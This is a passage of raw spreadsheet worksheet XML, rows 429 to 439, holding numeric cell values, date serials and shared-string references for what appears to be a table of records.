        <v>1</v>
      </c>
      <c r="U429">
        <v>0</v>
      </c>
      <c r="V429">
        <v>3000</v>
      </c>
      <c r="W429">
        <v>0</v>
      </c>
      <c r="X429">
        <v>0</v>
      </c>
      <c r="Y429">
        <v>0</v>
      </c>
      <c r="Z429">
        <v>0</v>
      </c>
      <c r="AA429">
        <v>0</v>
      </c>
      <c r="AB429">
        <v>0</v>
      </c>
      <c r="AC429">
        <v>500</v>
      </c>
      <c r="AD429">
        <v>0</v>
      </c>
      <c r="AE429">
        <v>65000</v>
      </c>
      <c r="AF429" t="s">
        <v>3523</v>
      </c>
      <c r="AG429">
        <v>61271</v>
      </c>
      <c r="AH429">
        <v>16</v>
      </c>
      <c r="AJ429">
        <v>242</v>
      </c>
      <c r="AK429" t="s">
        <v>3524</v>
      </c>
      <c r="AL429" t="s">
        <v>3525</v>
      </c>
      <c r="AM429" t="s">
        <v>3526</v>
      </c>
      <c r="AN429" t="s">
        <v>55</v>
      </c>
      <c r="AO429">
        <v>1986</v>
      </c>
      <c r="AP429" t="s">
        <v>3527</v>
      </c>
      <c r="AQ429" t="s">
        <v>3523</v>
      </c>
      <c r="AR429" t="s">
        <v>3523</v>
      </c>
      <c r="AS429" t="s">
        <v>71</v>
      </c>
      <c r="AT429" t="s">
        <v>58</v>
      </c>
      <c r="AU429">
        <v>26</v>
      </c>
      <c r="AV429">
        <v>1</v>
      </c>
      <c r="AW429">
        <v>0</v>
      </c>
      <c r="AX429">
        <v>0</v>
      </c>
      <c r="AY429">
        <v>49</v>
      </c>
      <c r="AZ429">
        <v>36</v>
      </c>
      <c r="BA429" t="s">
        <v>17306</v>
      </c>
      <c r="BB429" t="s">
        <v>15068</v>
      </c>
      <c r="BC429">
        <v>0</v>
      </c>
      <c r="BD429" t="s">
        <v>12033</v>
      </c>
    </row>
    <row r="430" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A430">
        <v>1274</v>
      </c>
      <c r="B430" t="s">
        <v>3528</v>
      </c>
      <c r="C430" t="s">
        <v>129</v>
      </c>
      <c r="D430" t="s">
        <v>3529</v>
      </c>
      <c r="E430" t="s">
        <v>111</v>
      </c>
      <c r="F430" t="s">
        <v>3530</v>
      </c>
      <c r="G430" s="1">
        <v>44167</v>
      </c>
      <c r="H430">
        <v>6108</v>
      </c>
      <c r="I430">
        <v>6108</v>
      </c>
      <c r="J430">
        <v>1</v>
      </c>
      <c r="K430">
        <v>0</v>
      </c>
      <c r="L430">
        <v>0</v>
      </c>
      <c r="M430">
        <v>0</v>
      </c>
      <c r="N430">
        <v>0</v>
      </c>
      <c r="O430">
        <v>0</v>
      </c>
      <c r="P430">
        <v>0</v>
      </c>
      <c r="Q430">
        <v>0</v>
      </c>
      <c r="R430">
        <v>0</v>
      </c>
      <c r="S430">
        <v>0</v>
      </c>
      <c r="T430">
        <v>0</v>
      </c>
      <c r="U430">
        <v>200000</v>
      </c>
      <c r="V430">
        <v>0</v>
      </c>
      <c r="W430">
        <v>0</v>
      </c>
      <c r="X430">
        <v>0</v>
      </c>
      <c r="Y430">
        <v>0</v>
      </c>
      <c r="Z430">
        <v>0</v>
      </c>
      <c r="AA430">
        <v>0</v>
      </c>
      <c r="AB430">
        <v>0</v>
      </c>
      <c r="AC430">
        <v>0</v>
      </c>
      <c r="AD430">
        <v>0</v>
      </c>
      <c r="AE430">
        <v>0</v>
      </c>
      <c r="AF430" t="s">
        <v>3531</v>
      </c>
      <c r="AG430">
        <v>15710</v>
      </c>
      <c r="AH430">
        <v>11</v>
      </c>
      <c r="AJ430">
        <v>268</v>
      </c>
      <c r="AK430" t="s">
        <v>277</v>
      </c>
      <c r="AL430" t="s">
        <v>278</v>
      </c>
      <c r="AM430" t="s">
        <v>3532</v>
      </c>
      <c r="AN430" t="s">
        <v>68</v>
      </c>
      <c r="AO430">
        <v>2014</v>
      </c>
      <c r="AP430">
        <v>81288588798</v>
      </c>
      <c r="AQ430" t="s">
        <v>3533</v>
      </c>
      <c r="AR430" t="s">
        <v>3534</v>
      </c>
      <c r="AS430" t="s">
        <v>71</v>
      </c>
      <c r="AT430" t="s">
        <v>72</v>
      </c>
      <c r="AU430">
        <v>6</v>
      </c>
      <c r="AV430">
        <v>2</v>
      </c>
      <c r="AW430">
        <v>0</v>
      </c>
      <c r="AX430">
        <v>0</v>
      </c>
      <c r="AY430">
        <v>7</v>
      </c>
      <c r="AZ430">
        <v>5</v>
      </c>
      <c r="BA430" t="s">
        <v>17595</v>
      </c>
      <c r="BB430" t="s">
        <v>15167</v>
      </c>
      <c r="BC430" t="s">
        <v>11980</v>
      </c>
      <c r="BD430">
        <v>0</v>
      </c>
    </row>
    <row r="431" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A431">
        <v>1182</v>
      </c>
      <c r="B431" t="s">
        <v>3535</v>
      </c>
      <c r="C431" t="s">
        <v>157</v>
      </c>
      <c r="D431" t="s">
        <v>3536</v>
      </c>
      <c r="E431" t="s">
        <v>944</v>
      </c>
      <c r="F431" t="s">
        <v>2407</v>
      </c>
      <c r="G431" s="1">
        <v>44137</v>
      </c>
      <c r="H431">
        <v>6139</v>
      </c>
      <c r="I431">
        <v>6139</v>
      </c>
      <c r="J431">
        <v>0</v>
      </c>
      <c r="K431">
        <v>2</v>
      </c>
      <c r="L431">
        <v>0</v>
      </c>
      <c r="M431">
        <v>0</v>
      </c>
      <c r="N431">
        <v>0</v>
      </c>
      <c r="O431">
        <v>0</v>
      </c>
      <c r="P431">
        <v>2</v>
      </c>
      <c r="Q431">
        <v>3</v>
      </c>
      <c r="R431">
        <v>3</v>
      </c>
      <c r="S431">
        <v>0</v>
      </c>
      <c r="T431">
        <v>1</v>
      </c>
      <c r="U431">
        <v>0</v>
      </c>
      <c r="V431">
        <v>30000</v>
      </c>
      <c r="W431">
        <v>0</v>
      </c>
      <c r="X431">
        <v>0</v>
      </c>
      <c r="Y431">
        <v>0</v>
      </c>
      <c r="Z431">
        <v>0</v>
      </c>
      <c r="AA431">
        <v>2000</v>
      </c>
      <c r="AB431">
        <v>40000</v>
      </c>
      <c r="AC431">
        <v>2000</v>
      </c>
      <c r="AD431">
        <v>0</v>
      </c>
      <c r="AE431">
        <v>40000</v>
      </c>
      <c r="AF431" t="s">
        <v>3537</v>
      </c>
      <c r="AG431">
        <v>61123</v>
      </c>
      <c r="AH431">
        <v>16</v>
      </c>
      <c r="AJ431">
        <v>252</v>
      </c>
      <c r="AK431" t="s">
        <v>387</v>
      </c>
      <c r="AL431" t="s">
        <v>3538</v>
      </c>
      <c r="AM431" t="s">
        <v>3539</v>
      </c>
      <c r="AN431" t="s">
        <v>82</v>
      </c>
      <c r="AO431">
        <v>2012</v>
      </c>
      <c r="AP431">
        <v>62313970023</v>
      </c>
      <c r="AQ431" t="s">
        <v>3540</v>
      </c>
      <c r="AR431" t="s">
        <v>3541</v>
      </c>
      <c r="AS431" t="s">
        <v>71</v>
      </c>
      <c r="AT431" t="s">
        <v>86</v>
      </c>
      <c r="AU431">
        <v>25</v>
      </c>
      <c r="AV431">
        <v>0</v>
      </c>
      <c r="AW431">
        <v>32</v>
      </c>
      <c r="AX431">
        <v>70</v>
      </c>
      <c r="AY431">
        <v>32</v>
      </c>
      <c r="AZ431">
        <v>12</v>
      </c>
      <c r="BA431" t="s">
        <v>16608</v>
      </c>
      <c r="BB431" t="s">
        <v>15106</v>
      </c>
      <c r="BC431">
        <v>0</v>
      </c>
      <c r="BD431" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="432" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A432">
        <v>1107</v>
      </c>
      <c r="B432" t="s">
        <v>3542</v>
      </c>
      <c r="C432" t="s">
        <v>99</v>
      </c>
      <c r="D432" t="s">
        <v>3543</v>
      </c>
      <c r="E432" t="s">
        <v>111</v>
      </c>
      <c r="F432" t="s">
        <v>3544</v>
      </c>
      <c r="G432" s="1">
        <v>44123</v>
      </c>
      <c r="H432">
        <v>6161</v>
      </c>
      <c r="I432">
        <v>6161</v>
      </c>
      <c r="J432">
        <v>3</v>
      </c>
      <c r="K432">
        <v>1</v>
      </c>
      <c r="L432">
        <v>2</v>
      </c>
      <c r="M432">
        <v>1</v>
      </c>
      <c r="N432">
        <v>0</v>
      </c>
      <c r="O432">
        <v>0</v>
      </c>
      <c r="P432">
        <v>0</v>
      </c>
      <c r="Q432">
        <v>0</v>
      </c>
      <c r="R432">
        <v>0</v>
      </c>
      <c r="S432">
        <v>0</v>
      </c>
      <c r="T432">
        <v>2</v>
      </c>
      <c r="U432">
        <v>30000</v>
      </c>
      <c r="V432">
        <v>1000</v>
      </c>
      <c r="W432">
        <v>600</v>
      </c>
      <c r="X432">
        <v>100</v>
      </c>
      <c r="Y432">
        <v>0</v>
      </c>
      <c r="Z432">
        <v>0</v>
      </c>
      <c r="AA432">
        <v>0</v>
      </c>
      <c r="AB432">
        <v>0</v>
      </c>
      <c r="AC432">
        <v>0</v>
      </c>
      <c r="AD432">
        <v>0</v>
      </c>
      <c r="AE432">
        <v>20000</v>
      </c>
      <c r="AF432" t="s">
        <v>3545</v>
      </c>
      <c r="AG432">
        <v>14450</v>
      </c>
      <c r="AH432">
        <v>12</v>
      </c>
      <c r="AJ432">
        <v>160</v>
      </c>
      <c r="AK432" t="s">
        <v>114</v>
      </c>
      <c r="AL432" t="s">
        <v>115</v>
      </c>
      <c r="AM432" t="s">
        <v>3546</v>
      </c>
      <c r="AN432" t="s">
        <v>55</v>
      </c>
      <c r="AO432">
        <v>2012</v>
      </c>
      <c r="AP432">
        <v>216681607</v>
      </c>
      <c r="AQ432" t="s">
        <v>3547</v>
      </c>
      <c r="AR432" t="s">
        <v>3545</v>
      </c>
      <c r="AS432" t="s">
        <v>179</v>
      </c>
      <c r="AT432" t="s">
        <v>58</v>
      </c>
      <c r="AU432">
        <v>30</v>
      </c>
      <c r="AV432">
        <v>3</v>
      </c>
      <c r="AW432">
        <v>45</v>
      </c>
      <c r="AX432">
        <v>20</v>
      </c>
      <c r="AY432">
        <v>65</v>
      </c>
      <c r="AZ432">
        <v>40</v>
      </c>
      <c r="BA432" t="s">
        <v>17524</v>
      </c>
      <c r="BB432" t="s">
        <v>15055</v>
      </c>
      <c r="BC432">
        <v>0</v>
      </c>
      <c r="BD432" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="433" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A433">
        <v>1127</v>
      </c>
      <c r="B433" t="s">
        <v>3548</v>
      </c>
      <c r="C433" t="s">
        <v>99</v>
      </c>
      <c r="D433" t="s">
        <v>3549</v>
      </c>
      <c r="E433" t="s">
        <v>111</v>
      </c>
      <c r="F433" t="s">
        <v>2099</v>
      </c>
      <c r="G433" s="1">
        <v>44235</v>
      </c>
      <c r="H433">
        <v>6171</v>
      </c>
      <c r="I433">
        <v>6171</v>
      </c>
      <c r="J433">
        <v>3</v>
      </c>
      <c r="K433">
        <v>3</v>
      </c>
      <c r="L433">
        <v>2</v>
      </c>
      <c r="M433">
        <v>0</v>
      </c>
      <c r="N433">
        <v>0</v>
      </c>
      <c r="O433">
        <v>0</v>
      </c>
      <c r="P433">
        <v>0</v>
      </c>
      <c r="Q433">
        <v>0</v>
      </c>
      <c r="R433">
        <v>3</v>
      </c>
      <c r="S433">
        <v>0</v>
      </c>
      <c r="T433">
        <v>4</v>
      </c>
      <c r="U433">
        <v>300000</v>
      </c>
      <c r="V433">
        <v>300000</v>
      </c>
      <c r="W433">
        <v>2000</v>
      </c>
      <c r="X433">
        <v>0</v>
      </c>
      <c r="Y433">
        <v>0</v>
      </c>
      <c r="Z433">
        <v>0</v>
      </c>
      <c r="AA433">
        <v>0</v>
      </c>
      <c r="AB433">
        <v>0</v>
      </c>
      <c r="AC433">
        <v>2500</v>
      </c>
      <c r="AD433">
        <v>0</v>
      </c>
      <c r="AE433">
        <v>50000</v>
      </c>
      <c r="AF433" t="s">
        <v>3550</v>
      </c>
      <c r="AG433">
        <v>14440</v>
      </c>
      <c r="AH433">
        <v>12</v>
      </c>
      <c r="AJ433">
        <v>160</v>
      </c>
      <c r="AK433" t="s">
        <v>114</v>
      </c>
      <c r="AL433" t="s">
        <v>114</v>
      </c>
      <c r="AM433" t="s">
        <v>3551</v>
      </c>
      <c r="AN433" t="s">
        <v>55</v>
      </c>
      <c r="AO433">
        <v>2009</v>
      </c>
      <c r="AP433" t="s">
        <v>3552</v>
      </c>
      <c r="AQ433" t="s">
        <v>3553</v>
      </c>
      <c r="AR433" t="s">
        <v>3550</v>
      </c>
      <c r="AS433" t="s">
        <v>71</v>
      </c>
      <c r="AT433" t="s">
        <v>58</v>
      </c>
      <c r="AU433">
        <v>26</v>
      </c>
      <c r="AV433">
        <v>1</v>
      </c>
      <c r="AW433">
        <v>48</v>
      </c>
      <c r="AX433">
        <v>4</v>
      </c>
      <c r="AY433">
        <v>25</v>
      </c>
      <c r="AZ433">
        <v>10</v>
      </c>
      <c r="BA433" t="s">
        <v>17554</v>
      </c>
      <c r="BB433" t="s">
        <v>15066</v>
      </c>
      <c r="BC433">
        <v>0</v>
      </c>
      <c r="BD433" t="s">
        <v>12247</v>
      </c>
    </row>
    <row r="434" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A434">
        <v>1048</v>
      </c>
      <c r="B434" t="s">
        <v>3554</v>
      </c>
      <c r="C434" t="s">
        <v>74</v>
      </c>
      <c r="D434" t="s">
        <v>3555</v>
      </c>
      <c r="E434" t="s">
        <v>142</v>
      </c>
      <c r="F434" t="s">
        <v>3556</v>
      </c>
      <c r="G434" s="1">
        <v>44097</v>
      </c>
      <c r="H434">
        <v>6174</v>
      </c>
      <c r="I434">
        <v>6174</v>
      </c>
      <c r="J434">
        <v>2</v>
      </c>
      <c r="K434">
        <v>0</v>
      </c>
      <c r="L434">
        <v>0</v>
      </c>
      <c r="M434">
        <v>3</v>
      </c>
      <c r="N434">
        <v>2000</v>
      </c>
      <c r="O434">
        <v>0</v>
      </c>
      <c r="P434">
        <v>0</v>
      </c>
      <c r="Q434">
        <v>6</v>
      </c>
      <c r="R434">
        <v>100</v>
      </c>
      <c r="S434">
        <v>0</v>
      </c>
      <c r="T434">
        <v>0</v>
      </c>
      <c r="U434">
        <v>160</v>
      </c>
      <c r="V434">
        <v>0</v>
      </c>
      <c r="W434">
        <v>0</v>
      </c>
      <c r="X434">
        <v>1</v>
      </c>
      <c r="Y434">
        <v>0</v>
      </c>
      <c r="Z434">
        <v>0</v>
      </c>
      <c r="AA434">
        <v>0</v>
      </c>
      <c r="AB434">
        <v>600</v>
      </c>
      <c r="AC434">
        <v>10</v>
      </c>
      <c r="AD434">
        <v>0</v>
      </c>
      <c r="AE434">
        <v>0</v>
      </c>
      <c r="AF434" t="s">
        <v>3557</v>
      </c>
      <c r="AG434">
        <v>53215</v>
      </c>
      <c r="AH434">
        <v>14</v>
      </c>
      <c r="AJ434">
        <v>188</v>
      </c>
      <c r="AK434" t="s">
        <v>3558</v>
      </c>
      <c r="AL434" t="s">
        <v>3559</v>
      </c>
      <c r="AM434" t="s">
        <v>3560</v>
      </c>
      <c r="AN434" t="s">
        <v>82</v>
      </c>
      <c r="AO434">
        <v>1997</v>
      </c>
      <c r="AP434" s="4">
        <v>282537966</v>
      </c>
      <c r="AQ434" t="s">
        <v>3561</v>
      </c>
      <c r="AR434" t="s">
        <v>3562</v>
      </c>
      <c r="AS434" t="s">
        <v>71</v>
      </c>
      <c r="AT434" t="s">
        <v>86</v>
      </c>
      <c r="AU434">
        <v>6</v>
      </c>
      <c r="AV434">
        <v>1</v>
      </c>
      <c r="AW434">
        <v>28</v>
      </c>
      <c r="AX434">
        <v>50</v>
      </c>
      <c r="AY434">
        <v>42</v>
      </c>
      <c r="AZ434">
        <v>15</v>
      </c>
      <c r="BA434" t="s">
        <v>16795</v>
      </c>
      <c r="BB434" t="s">
        <v>15018</v>
      </c>
      <c r="BC434">
        <v>0</v>
      </c>
      <c r="BD434">
        <v>0</v>
      </c>
    </row>
    <row r="435" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A435">
        <v>1399</v>
      </c>
      <c r="B435" t="s">
        <v>3563</v>
      </c>
      <c r="C435" t="s">
        <v>3013</v>
      </c>
      <c r="D435" t="s">
        <v>3564</v>
      </c>
      <c r="E435" t="s">
        <v>3565</v>
      </c>
      <c r="F435" t="s">
        <v>3566</v>
      </c>
      <c r="G435" s="1">
        <v>44095</v>
      </c>
      <c r="H435">
        <v>6184</v>
      </c>
      <c r="I435">
        <v>6184</v>
      </c>
      <c r="J435">
        <v>0</v>
      </c>
      <c r="K435">
        <v>1</v>
      </c>
      <c r="L435">
        <v>0</v>
      </c>
      <c r="M435">
        <v>0</v>
      </c>
      <c r="N435">
        <v>0</v>
      </c>
      <c r="O435">
        <v>0</v>
      </c>
      <c r="P435">
        <v>0</v>
      </c>
      <c r="Q435">
        <v>1</v>
      </c>
      <c r="R435">
        <v>1</v>
      </c>
      <c r="S435">
        <v>0</v>
      </c>
      <c r="T435">
        <v>0</v>
      </c>
      <c r="U435">
        <v>0</v>
      </c>
      <c r="V435">
        <v>5000</v>
      </c>
      <c r="W435">
        <v>0</v>
      </c>
      <c r="X435">
        <v>0</v>
      </c>
      <c r="Y435">
        <v>0</v>
      </c>
      <c r="Z435">
        <v>0</v>
      </c>
      <c r="AA435">
        <v>0</v>
      </c>
      <c r="AB435">
        <v>1000</v>
      </c>
      <c r="AC435">
        <v>1000</v>
      </c>
      <c r="AD435">
        <v>0</v>
      </c>
      <c r="AE435">
        <v>0</v>
      </c>
      <c r="AF435" t="s">
        <v>3567</v>
      </c>
      <c r="AG435">
        <v>28914</v>
      </c>
      <c r="AH435">
        <v>4</v>
      </c>
      <c r="AJ435">
        <v>84</v>
      </c>
      <c r="AK435" t="s">
        <v>3568</v>
      </c>
      <c r="AL435" t="s">
        <v>3569</v>
      </c>
      <c r="AM435" t="s">
        <v>3570</v>
      </c>
      <c r="AN435" t="s">
        <v>68</v>
      </c>
      <c r="AO435">
        <v>2016</v>
      </c>
      <c r="AP435">
        <v>82384797371</v>
      </c>
      <c r="AQ435" t="s">
        <v>3571</v>
      </c>
      <c r="AR435" t="s">
        <v>3567</v>
      </c>
      <c r="AU435">
        <v>30</v>
      </c>
      <c r="AV435">
        <v>0</v>
      </c>
      <c r="AW435">
        <v>6</v>
      </c>
      <c r="AX435">
        <v>2</v>
      </c>
      <c r="AY435">
        <v>6</v>
      </c>
      <c r="AZ435">
        <v>2</v>
      </c>
      <c r="BA435" t="s">
        <v>16873</v>
      </c>
      <c r="BB435" t="s">
        <v>15250</v>
      </c>
      <c r="BC435" t="s">
        <v>11985</v>
      </c>
      <c r="BD435" t="s">
        <v>10582</v>
      </c>
    </row>
    <row r="436" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A436">
        <v>1230</v>
      </c>
      <c r="B436" t="s">
        <v>3572</v>
      </c>
      <c r="C436" t="s">
        <v>318</v>
      </c>
      <c r="D436" t="s">
        <v>3573</v>
      </c>
      <c r="E436" t="s">
        <v>809</v>
      </c>
      <c r="F436" t="s">
        <v>3574</v>
      </c>
      <c r="G436" s="1">
        <v>44144</v>
      </c>
      <c r="H436">
        <v>6203</v>
      </c>
      <c r="I436">
        <v>6203</v>
      </c>
      <c r="J436">
        <v>1</v>
      </c>
      <c r="K436">
        <v>1</v>
      </c>
      <c r="L436">
        <v>2</v>
      </c>
      <c r="M436">
        <v>0</v>
      </c>
      <c r="N436">
        <v>0</v>
      </c>
      <c r="O436">
        <v>0</v>
      </c>
      <c r="P436">
        <v>0</v>
      </c>
      <c r="Q436">
        <v>5</v>
      </c>
      <c r="R436">
        <v>5</v>
      </c>
      <c r="S436">
        <v>0</v>
      </c>
      <c r="T436">
        <v>0</v>
      </c>
      <c r="U436">
        <v>200</v>
      </c>
      <c r="V436">
        <v>2000</v>
      </c>
      <c r="W436">
        <v>2000</v>
      </c>
      <c r="X436">
        <v>0</v>
      </c>
      <c r="Y436">
        <v>0</v>
      </c>
      <c r="Z436">
        <v>0</v>
      </c>
      <c r="AA436">
        <v>0</v>
      </c>
      <c r="AB436">
        <v>0</v>
      </c>
      <c r="AC436">
        <v>11</v>
      </c>
      <c r="AD436">
        <v>0</v>
      </c>
      <c r="AE436">
        <v>0</v>
      </c>
      <c r="AF436" t="s">
        <v>3575</v>
      </c>
      <c r="AG436">
        <v>90241</v>
      </c>
      <c r="AH436">
        <v>26</v>
      </c>
      <c r="AJ436">
        <v>420</v>
      </c>
      <c r="AK436" t="s">
        <v>331</v>
      </c>
      <c r="AL436" t="s">
        <v>332</v>
      </c>
      <c r="AM436" t="s">
        <v>3576</v>
      </c>
      <c r="AN436" t="s">
        <v>55</v>
      </c>
      <c r="AO436">
        <v>2013</v>
      </c>
      <c r="AP436" t="s">
        <v>3577</v>
      </c>
      <c r="AQ436" t="s">
        <v>3578</v>
      </c>
      <c r="AR436" t="s">
        <v>3575</v>
      </c>
      <c r="AS436" t="s">
        <v>71</v>
      </c>
      <c r="AT436" t="s">
        <v>58</v>
      </c>
      <c r="AU436">
        <v>0</v>
      </c>
      <c r="AV436">
        <v>0</v>
      </c>
      <c r="AW436">
        <v>6</v>
      </c>
      <c r="AX436">
        <v>14</v>
      </c>
      <c r="AY436">
        <v>4</v>
      </c>
      <c r="AZ436">
        <v>20</v>
      </c>
      <c r="BA436" t="s">
        <v>17253</v>
      </c>
      <c r="BB436" t="s">
        <v>15141</v>
      </c>
      <c r="BC436" t="s">
        <v>11301</v>
      </c>
      <c r="BD436" t="s">
        <v>12045</v>
      </c>
    </row>
    <row r="437" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A437">
        <v>1142</v>
      </c>
      <c r="B437" t="s">
        <v>3579</v>
      </c>
      <c r="C437" t="s">
        <v>157</v>
      </c>
      <c r="D437" t="s">
        <v>3580</v>
      </c>
      <c r="E437" t="s">
        <v>363</v>
      </c>
      <c r="F437" t="s">
        <v>3581</v>
      </c>
      <c r="G437" s="1">
        <v>44230</v>
      </c>
      <c r="H437">
        <v>6257</v>
      </c>
      <c r="I437">
        <v>6257</v>
      </c>
      <c r="J437">
        <v>0</v>
      </c>
      <c r="K437">
        <v>0</v>
      </c>
      <c r="L437">
        <v>0</v>
      </c>
      <c r="M437">
        <v>0</v>
      </c>
      <c r="N437">
        <v>0</v>
      </c>
      <c r="O437">
        <v>0</v>
      </c>
      <c r="P437">
        <v>0</v>
      </c>
      <c r="Q437">
        <v>0</v>
      </c>
      <c r="R437">
        <v>0</v>
      </c>
      <c r="S437">
        <v>0</v>
      </c>
      <c r="T437">
        <v>3</v>
      </c>
      <c r="U437">
        <v>0</v>
      </c>
      <c r="V437">
        <v>0</v>
      </c>
      <c r="W437">
        <v>0</v>
      </c>
      <c r="X437">
        <v>0</v>
      </c>
      <c r="Y437">
        <v>0</v>
      </c>
      <c r="Z437">
        <v>0</v>
      </c>
      <c r="AA437">
        <v>0</v>
      </c>
      <c r="AB437">
        <v>0</v>
      </c>
      <c r="AC437">
        <v>0</v>
      </c>
      <c r="AD437">
        <v>1</v>
      </c>
      <c r="AE437">
        <v>130000</v>
      </c>
      <c r="AF437" t="s">
        <v>3582</v>
      </c>
      <c r="AG437">
        <v>60196</v>
      </c>
      <c r="AH437">
        <v>16</v>
      </c>
      <c r="AJ437">
        <v>264</v>
      </c>
      <c r="AK437" t="s">
        <v>3583</v>
      </c>
      <c r="AL437" t="s">
        <v>3583</v>
      </c>
      <c r="AM437" t="s">
        <v>3584</v>
      </c>
      <c r="AN437" t="s">
        <v>55</v>
      </c>
      <c r="AO437">
        <v>2008</v>
      </c>
      <c r="AP437" t="s">
        <v>3585</v>
      </c>
      <c r="AQ437" t="s">
        <v>3582</v>
      </c>
      <c r="AR437" t="s">
        <v>3582</v>
      </c>
      <c r="AS437" t="s">
        <v>371</v>
      </c>
      <c r="AT437" t="s">
        <v>58</v>
      </c>
      <c r="AU437">
        <v>6</v>
      </c>
      <c r="AV437">
        <v>0</v>
      </c>
      <c r="AW437">
        <v>8</v>
      </c>
      <c r="AX437">
        <v>8</v>
      </c>
      <c r="AY437">
        <v>1</v>
      </c>
      <c r="AZ437">
        <v>5</v>
      </c>
      <c r="BA437" t="s">
        <v>16807</v>
      </c>
      <c r="BB437" t="s">
        <v>15080</v>
      </c>
      <c r="BC437">
        <v>0</v>
      </c>
      <c r="BD437" t="s">
        <v>12113</v>
      </c>
    </row>
    <row r="438" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A438">
        <v>965</v>
      </c>
      <c r="B438" t="s">
        <v>3586</v>
      </c>
      <c r="C438" t="s">
        <v>157</v>
      </c>
      <c r="D438" t="s">
        <v>3587</v>
      </c>
      <c r="E438" t="s">
        <v>142</v>
      </c>
      <c r="F438" t="s">
        <v>3588</v>
      </c>
      <c r="G438" s="1">
        <v>44155</v>
      </c>
      <c r="H438">
        <v>6296</v>
      </c>
      <c r="I438">
        <v>6296</v>
      </c>
      <c r="J438">
        <v>2</v>
      </c>
      <c r="K438">
        <v>0</v>
      </c>
      <c r="L438">
        <v>2</v>
      </c>
      <c r="M438">
        <v>2</v>
      </c>
      <c r="N438">
        <v>0</v>
      </c>
      <c r="O438">
        <v>0</v>
      </c>
      <c r="P438">
        <v>0</v>
      </c>
      <c r="Q438">
        <v>2</v>
      </c>
      <c r="R438">
        <v>15</v>
      </c>
      <c r="S438">
        <v>0</v>
      </c>
      <c r="T438">
        <v>4</v>
      </c>
      <c r="U438">
        <v>600000</v>
      </c>
      <c r="V438">
        <v>0</v>
      </c>
      <c r="W438">
        <v>150000</v>
      </c>
      <c r="X438">
        <v>2200</v>
      </c>
      <c r="Y438">
        <v>0</v>
      </c>
      <c r="Z438">
        <v>0</v>
      </c>
      <c r="AA438">
        <v>0</v>
      </c>
      <c r="AB438">
        <v>5000</v>
      </c>
      <c r="AC438">
        <v>3750</v>
      </c>
      <c r="AD438">
        <v>0</v>
      </c>
      <c r="AE438">
        <v>30000</v>
      </c>
      <c r="AF438" t="s">
        <v>3589</v>
      </c>
      <c r="AG438">
        <v>67152</v>
      </c>
      <c r="AH438">
        <v>16</v>
      </c>
      <c r="AJ438">
        <v>241</v>
      </c>
      <c r="AK438" t="s">
        <v>1117</v>
      </c>
      <c r="AL438" t="s">
        <v>1117</v>
      </c>
      <c r="AM438" t="s">
        <v>3590</v>
      </c>
      <c r="AN438" t="s">
        <v>68</v>
      </c>
      <c r="AO438">
        <v>2006</v>
      </c>
      <c r="AP438" t="s">
        <v>3591</v>
      </c>
      <c r="AQ438" t="s">
        <v>3592</v>
      </c>
      <c r="AR438" t="s">
        <v>3589</v>
      </c>
      <c r="AS438" t="s">
        <v>71</v>
      </c>
      <c r="AT438" t="s">
        <v>72</v>
      </c>
      <c r="AU438">
        <v>26</v>
      </c>
      <c r="AV438">
        <v>3</v>
      </c>
      <c r="AW438">
        <v>9</v>
      </c>
      <c r="AX438">
        <v>5</v>
      </c>
      <c r="AY438">
        <v>21</v>
      </c>
      <c r="AZ438">
        <v>7</v>
      </c>
      <c r="BA438" t="s">
        <v>17526</v>
      </c>
      <c r="BB438" t="s">
        <v>14968</v>
      </c>
      <c r="BC438">
        <v>0</v>
      </c>
      <c r="BD438" t="s">
        <v>12036</v>
      </c>
    </row>
    <row r="439" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A439">
        <v>954</v>
      </c>
      <c r="B439" t="s">
        <v>3593</v>
      </c>
      <c r="C439" t="s">
        <v>477</v>
      </c>
      <c r="D439" t="s">
        <v>3594</v>
      </c>
      <c r="E439" t="s">
        <v>300</v>
      </c>
      <c r="F439" t="s">
        <v>3595</v>
      </c>
      <c r="G439" s="1">
        <v>44218</v>
      </c>
      <c r="H439">
        <v>6316</v>
      </c>
      <c r="I439">
        <v>6316</v>
      </c>
      <c r="J439">
        <v>3</v>
      </c>
      <c r="K439">
        <v>3</v>
      </c>
      <c r="L439">
        <v>7</v>
      </c>
      <c r="M439">
        <v>0</v>
      </c>
      <c r="N439">
        <v>0</v>
      </c>
      <c r="O439">
        <v>0</v>
      </c>
      <c r="P439">
        <v>0</v>
      </c>
      <c r="Q439">
        <v>0</v>
      </c>
      <c r="R439">
        <v>7</v>
      </c>
      <c r="S439">
        <v>0</v>
      </c>
      <c r="T439">
        <v>0</v>
      </c>
      <c r="U439">
        <v>150000</v>
      </c>
      <c r="V439">
        <v>8000</v>
      </c>
      <c r="W439">
        <v>17500</v>
      </c>
      <c r="X439">
        <v>0</v>
      </c>
      <c r="Y439">
        <v>0</v>
      </c>
      <c r="Z439">
        <v>0</v>
      </c>
      <c r="AA439">
        <v>0</v>
      </c>
      <c r="AB439">
        <v>0</v>
      </c>
      <c r="AC439">
        <v>7000</v>
      </c>
      <c r="AD439">
        <v>0</v>
      </c>
      <c r="AE439">
        <v>0</v>
      </c>
      <c r="AF439" t="s">
        <v>1878</v>
      </c>
      <c r="AG439">
        <v>95526</v>
      </c>
      <c r="AH439">
        <v>29</v>
      </c>
      <c r="AJ439">
        <v>383</v>
      </c>
      <c r="AK439" t="s">
        <v>2986</v>
      </c>
      <c r="AL439" t="s">
        <v>3596</v>
      </c>
      <c r="AM439" t="s">
        <v>3597</v>
      </c>
      <c r="AN439" t="s">
        <v>55</v>
      </c>
      <c r="AO439">
        <v>2005</v>
      </c>
      <c r="AP439" t="s">
        <v>3598</v>
      </c>
      <c r="AQ439" t="s">
        <v>3599</v>
      </c>
      <c r="AR439" t="s">
        <v>3600</v>
      </c>
      <c r="AS439" t="s">
        <v>71</v>
      </c>
      <c r="AT439" t="s">
        <v>58</v>
      </c>
      <c r="AU439">
        <v>25</v>
      </c>
      <c r="AV439">
        <v>1</v>
      </c>
      <c r="AW439">
        <v>25</v>
      </c>
